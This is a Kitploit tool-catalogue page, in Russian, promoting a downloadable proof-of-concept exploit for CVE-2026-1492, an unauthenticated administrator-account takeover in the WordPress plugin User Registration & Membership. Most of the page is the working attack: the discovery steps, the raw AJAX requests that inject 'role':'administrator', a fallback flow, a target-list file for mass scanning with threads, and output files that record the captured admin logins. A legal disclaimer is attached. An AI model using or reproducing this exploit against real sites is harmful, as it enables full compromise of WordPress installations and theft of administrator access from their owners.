Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-1492 — User Registration & Membership <= 5.1.2 - Неаутентифицированное повышение привилегий через регистрацию членства | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-1492
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubnxploited/cve-2026-1492

CVE-2026-1492

User Registration & Membership <= 5.1.2 - Неаутентифицированное повышение привилегий через регистрацию членства

Репозиторий
24 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-1492

User Registration & Membership <= 5.1.2 — неаутентифицированное повышение привилегий через регистрацию членства

Печатающий SVG


🔴 Обзор уязвимости

CVE-2026-1492 — неаутентифицированное повышение привилегий через регистрацию членства

Описание:
Плагин User Registration & Membership для WordPress уязвим к неаутентифицированному повышению привилегий во всех версиях вплоть до 5.1.2 включительно. Уязвимость связана с тем, что AJAX-обработчик user_registration_membership_register_member принимает передаваемое пользователем значение role в процессе регистрации членства без применения на стороне сервера разрешённого списка значений (allowlist) и без проверки прав. Полностью неаутентифицированный удалённый злоумышленник может выстроить многошаговую цепочку AJAX-запросов — сначала зарегистрировать новую учётную запись, затем отправить вредоносный вызов register_member со значением "role": "administrator", внедрённым в JSON-полезную нагрузку members_data, — чтобы незаметно создать полностью привилегированную учётную запись Administrator в WordPress. Это приводит к полной компрометации затронутой установки WordPress без какого-либо взаимодействия с пользователем.


🛠️ Описание инструмента

Это PoC-эксплойт (Proof-of-Concept), реализующий полную атакующую цепочку с учётом состояния против сайтов на WordPress, на которых установлена уязвимая версия плагина User Registration & Membership. Инструмент выполняет интеллектуальную многоэтапную эксплуатацию с автоматическим обнаружением, извлечением планов членства, сбором nonce, регистрацией по двум сценариям, инъекцией роли и проверкой прав администратора.

🔗 Полная цепочка атаки

root@kitploit:~
[Discovery Phase]
  GET /membership-pricing/  →  Extract membership plan IDs
  GET /registration/        →  Extract form fields, nonces, AJAX params

        ↓

[Registration Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_user_form_submit
  → Register new user account

        ↓

[Role Injection Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_membership_register_member
  members_data={"role":"administrator", "membership":"<id>", ...}
  → Inject administrator role into newly created account

        ↓

[Admin Verification Phase]
  GET /wp-admin/  →  Check for admin dashboard indicators
  GET /wp-admin/plugin-install.php  →  Confirm plugin-install access

        ↓

[Fallback Override — Flow B]
  If Flow A admin check fails → repeat with fresh username/email

        ↓

[Write to Nx_admin.txt]
  Format: https://target.com/wp-login.php user:<u> pass:<p>

📋 Требования

Системные требования

  • Python 3.8 или выше
  • Linux / Windows / macOS

Зависимости Python

root@kitploit:~
pip install requests urllib3 rich

Или через файл requirements:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1492.git
cd CVE-2026-1492

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-1492.py

⚙️ Использование

Базовый запуск

root@kitploit:~
python3 CVE-2026-1492.py

Инструмент использует полностью интерактивный терминальный интерфейс на базе Rich. Все параметры запрашиваются во время выполнения.


🗂️ Формат списка целей

Создайте обычный текстовый файл (по умолчанию: list.txt) с одной целью на строку:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🖥️ Интерактивные подсказки

root@kitploit:~
Targets file [list.txt]: list.txt

Credentials:
  - Username prefix: random number is added per site (fresh user per target/plan/flow)
  - Email: if left empty, it will be built from the username automatically
  - Password: fixed for all sites

Username prefix (optional): Nxploited
Email (optional): 
Password [Nx_12999]: Nx_12999
Threads [3]: 5
HTTP timeout (seconds) [10]: 10

🔬 Детальный разбор эксплуатации

Шаг 1 — Обнаружение

Инструмент автоматически обнаруживает и разбирает:

Шаг 2 — AJAX-регистрация

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_user_form_submit
&form_data=[{"field_name":"user_login","value":"Nxploited_A_482910",...}]
&form_id=1
&ur_frontend_form_nonce=<extracted_nonce>
&security=<extracted_security>
&is_membership_active=<membership_id>

Шаг 3 — AJAX-инъекция роли (уязвимый вызов)

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_membership_register_member
&members_data={"membership":"<id>","payment_method":"free","role":"administrator","username":"Nxploited_A_482910",...}
&form_response={...}
&_wpnonce=<membership_nonce>
&security=<membership_nonce>

⚠️ Сервер принимает поле role от клиента без проверки по разрешённому списку значений — это первопричина CVE-2026-1492.

Шаг 4 — Проверка прав администратора

Инструмент открывает новую сессию, входит под только что созданными учётными данными и проверяет:


📁 Выходные файлы

📄 Формат вывода администратора

root@kitploit:~
https://target.com/wp-login.php user:Nxploited_A_482910|pass:Nx_12999

🖥️ Пример вывода в терминале

root@kitploit:~
╔══════════════════════════════════════════════════════════════════════╗
║   CVE-2026-1492  |  User Registration & Membership — Admin PoC      ║
║   By: Nxploited  |  GitHub: github.com/Nxploited  |  @KNxploited    ║
╚══════════════════════════════════════════════════════════════════════╝

[INFO]   https://target.com
[OK]     https://target.com  |  REG-A-OK  user:Nxploited_A_482910 mem:3
[OK]     https://target.com  |  MEM-A-OK  membership A (role=administrator payload) sent
[OK]     https://target.com  |  ADMIN-A   user:Nxploited_A_482910 pass:Nx_12999 mem:3

┌─────────────────────────────��───────────────────────────────────────────────┐
│  Target                  │  Status           │  Note                        │
├─────────────────────────────────────────────────────────────────────────────┤
│  https://target.com      │  ✅ ADMIN-A       │  user:Nxploited_A_482910 ... │
│  https://target2.com     │  MEM-B-FAIL       │  membership not configured   │
│  https://target3.com     │  DEAD             │  connection error            │
└─────────────────────────────────────────────────────────────────────────────┘

📊 Справочник кодов состояния


📡 Контакты и автор

Автор: Nxploited (Khaled Alenazi)

 


⚠️ Правовой отказ от ответственности

ЭТОТ ИНСТРУМЕНТ ПРЕДОСТАВЛЕН ИСКЛЮЧИТЕЛЬНО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И САНКЦИОНИРОВАННЫХ ИССЛЕДОВАНИЙ БЕЗОПАСНОСТИ.

Автор, Nxploited (Khaled Alenazi), и все участники этого проекта не одобряют, не поддерживают и не несут никакой ответственности за неправомерное использование этого инструмента или любой ущерб, причинённый применением данного ПО против систем, на тестирование которых у вас нет явного письменного разрешения.

  • ✅ Разрешено: Использование на системах, которыми вы владеете или на тестирование которых получили явное письменное разрешение.
  • ❌ Запрещено: Использование против любых систем без предварительного явного письменного разрешения владельца системы.

Несанкционированный доступ к компьютерным системам является незаконным и наказывается в соответствии с применимым законодательством, включая, помимо прочего, Закон о компьютерном мошенничестве и злоупотреблениях (CFAA), Закон о компьютерных злоупотреблениях (CMA) и аналогичное законодательство по всему миру.

Используя этот инструмент, вы принимаете на себя полную и единоличную ответственность за свои действия и подтверждаете, что обладаете законными полномочиями на тестирование выбранных систем.

Автор не несёт никакой ответственности за любые прямые, косвенные, случайные или последующие убытки, возникшие в результате использования или неправильного использования данного ПО.


© 2026 Nxploited (Khaled Alenazi) — Только для санкционированных исследований безопасности.

Скачать инструмент
ПолеОписание
CVE IDCVE-2026-1492
КритичностьКритическая — оценка CVSS v3.1: 9.8
ВекторCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Затронутое ПОUser Registration & Membership — плагин для WordPress: конструктор пользовательских форм регистрации, пользовательская форма входа, профиль пользователя, ограничение контента и управление членством
Затронутые версииВсе версии вплоть до 5.1.2 включительно
Тип уязвимостиНекорректное управление привилегиями — неаутентифицированное создание учётной записи администратора
Требуемая аутентификацияОтсутствует
CWECWE-269: Некорректное управление привилегиями
ЦельЧто извлекается
/membership-pricing/ID планов членства, ссылки на страницу регистрации
/registration/Поля формы, nonce, AJAX-URL, radio-переключатели членства
JS-объект user_registration_paramsajax_url, nonce security, метаданные формы
ur_membership_frontend_localized_dataотдельный nonce для членства, AJAX-конечная точка
Конечная точкаПроверяемый индикатор
/wp-admin/adminmenu, wp-admin-bar, manage_options
/wp-admin/users.phpusers.php
/wp-admin/plugin-install.phpupload-plugin, plugin-install-tab
ФайлОписание
Nx_admin.txt✅ Подтверждённые учётные записи администратора
membership_success_log.txtВсе успешные вызовы инъекции роли членства
discovery_log.txtВсе данные обнаружения по каждой цели (nonce, ID, поля)
registration_log.txtВсе AJAX-запросы и ответы регистрации
membership_log.txtВсе AJAX-запросы и ответы по членству
admin_check_log.txtПопытки входа и результаты проверки прав администратора
СтатусЦветЗначение
ADMIN-A / ADMIN-B🟢 ЗелёныйАдминистратор подтверждён — сценарий A или B
ADMIN-A-OVERRIDE🟢 ЗелёныйАдминистратор подтверждён после попытки переопределения
REG-A-FAIL / REG-B-FAIL🟡 ЖёлтыйAJAX-запрос регистрации вернул ошибку
MEM-A-FAIL / MEM-B-FAIL🟣 ПурпурныйВызов инъекции роли членства не удался
REG-PENDING-A/B⚫ ТёмныйУчётная запись требует подтверждения по электронной почте или одобрения администратора
NO-MEM-ID⚫ ТёмныйID плана членства не найден на цели
NO-UR-NONCE⚫ ТёмныйNonce регистрации не удалось извлечь
NO-ADMIN⚫ ТёмныйЧленство в порядке, но доступ администратора не подтверждён
TIMEOUT⚫ ТёмныйТайм-аут HTTP
DEAD⚫ ТёмныйОшибка соединения — сайт недоступен
ERROR🔴 КрасныйНепредвиденное исключение